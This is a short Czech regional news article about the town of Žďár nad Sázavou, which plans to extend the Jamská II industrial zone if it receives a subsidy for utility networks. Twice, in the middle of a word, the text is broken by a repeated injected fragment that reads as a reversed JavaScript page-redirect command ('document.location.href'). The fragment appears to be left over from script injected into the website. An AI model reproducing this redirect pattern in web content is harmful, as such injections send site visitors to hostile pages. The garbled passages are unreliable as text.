Rainbow page separator

Průmyslovou zónu čeká rozšíření, ale jenom s podporou dotace

Sobota, 21. září 2019

Peníze, papírové bankovky

Žďár nad Sázavou / Na zhruba s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to milionů korun vyjde zasíťování další části žďárské průmyslové zóny. První část zóny je už zaplněná. Pozemky o rozloze jedenácti hektarů už má žďárská radnice vykoupené, aktuálně čeká, zda bude úspěšná se svojí žádostí o dotační podporu na technické sítě. Ta by mohla pokrýt až pětaosmdesát procent potřebných nákladů, verdikt by se měli zástupci Žďáru dozvědět v průběhu prosince.

Pokud bude měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úspěšné, stavět se v zóně Jamská II bude už v příštím roce a firmy, které si budou od města zasíťované pozemky kupovat, by ji mohly začít plnit v roce 2021. Přednost by měly dostat zejména rozvíjející se místní firmy, anebo společnosti, u kterých se dá mimo jiné předpokládat, že za pár let neodejdou jinam.

Za předpokladu, že Žďár dotaci na výstavbu inženýrských sítí nezíská, rozvoj další části průmyslové zóny bude muset počkat na vyhlášení dalšího dotačního titulu, neboť vedení města se do finančně náročné akce bez finanční podpory zatím pouštět nehodlá.